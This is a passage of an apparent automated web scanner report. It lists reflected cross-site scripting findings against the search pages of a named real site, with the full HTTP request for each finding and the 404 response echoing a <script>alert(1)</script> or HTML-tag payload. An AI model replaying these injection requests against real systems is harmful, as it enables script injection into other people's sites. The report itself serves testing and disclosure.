Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themese5499<script>alert(1)</script>23b145036fd/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2054. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ea20c<script>alert(1)</script>b3f80660ea4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmosea20c<script>alert(1)</script>b3f80660ea4/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmosea20c<script>alert(1)</script>b3f80660ea4/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2055. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload db2a9<script>alert(1)</script>412066115dc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/imagesdb2a9<script>alert(1)</script>412066115dc/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/imagesdb2a9<script>alert(1)</script>412066115dc/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2056. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2cdce<script>alert(1)</script>01bd23ea19d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/search.php2cdce<script>alert(1)</script>01bd23ea19d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/search.php2cdce<script>alert(1)</script>01bd23ea19d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2057. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1b3d3<a>1849719ba71 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search1b3d3<a>1849719ba71&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search1b3d3<a>1849719ba71&opt=2 was not found on this server.</p>
...[SNIP]...

2.2058. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a6f34<a>97627ff6af9 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/images/search.php?keyword=search...a6f34<a>97627ff6af9&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/search.php?keyword=search...a6f34<a>97627ff6af9&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2059. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b1e57<script>alert(1)</script>2b611a9d9be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&b1e57<script>alert(1)</script>2b611a9d9be=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&b1e57<script>alert(1)</script>2b611a9d9be=1 was not found on this server.</p>
...[SNIP]...

2.2060. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload bff9e<a>e7cd7013c3a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2bff9e<a>e7cd7013c3a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2bff9e<a>e7cd7013c3a was not found on this server.</p>
...[SNIP]...

2.2061. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7d57a<script>alert(1)</script>87bfe519ee9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7d57a<script>alert(1)</script>87bfe519ee9/29/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7d57a<script>alert(1)</script>87bfe519ee9/29/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2062. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5a27<script>alert(1)</script>c074d4a8941 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29c5a27<script>alert(1)</script>c074d4a8941/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29c5a27<script>alert(1)</script>c074d4a8941/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2063. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b7da8<script>alert(1)</script>621fdc3e9e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themesb7da8<script>alert(1)</script>621fdc3e9e1/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themesb7da8<script>alert(1)</script>621fdc3e9e1/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2064. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e7d61<script>alert(1)</script>371dda27184 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmose7d61<script>alert(1)</script>371dda27184/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmose7d61<script>alert(1)</script>371dda27184/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2065. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 23f55<script>alert(1)</script>29ec97c6763 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/search.php23f55<script>alert(1)</script>29ec97c6763?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/search.php23f55<script>alert(1)</script>29ec97c6763?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2066. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload ac7df<a>9a67f36d21a was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/search.php?keyword=search...&Submit3=Searchac7df<a>9a67f36d21a&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/search.php?keyword=search...&Submit3=Searchac7df<a>9a67f36d21a&opt=2 was not found on this server.</p>
...[SNIP]...

2.2067. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload cabab<a>25cbdb077eb was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/search.php?keyword=search...cabab<a>25cbdb077eb&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/search.php?keyword=search...cabab<a>25cbdb077eb&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2068. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 25d93<script>alert(1)</script>525b8fae030 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&25d93<script>alert(1)</script>525b8fae030=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&25d93<script>alert(1)</script>525b8fae030=1 was not found on this server.</p>
...[SNIP]...

2.2069. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload dc3d3<a>57ba6b20ee1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2dc3d3<a>57ba6b20ee1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2dc3d3<a>57ba6b20ee1 was not found on this server.</p>
...[SNIP]...

2.2070. http://www.resellerbase.com/detail/29/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 680a8<script>alert(1)</script>6f2fb791fcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail680a8<script>alert(1)</script>6f2fb791fcd/29/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail680a8<script>alert(1)</script>6f2fb791fcd/29/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2071. http://www.resellerbase.com/detail/29/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5e990<script>alert(1)</script>66c41fb553e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/295e990<script>alert(1)</script>66c41fb553e/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
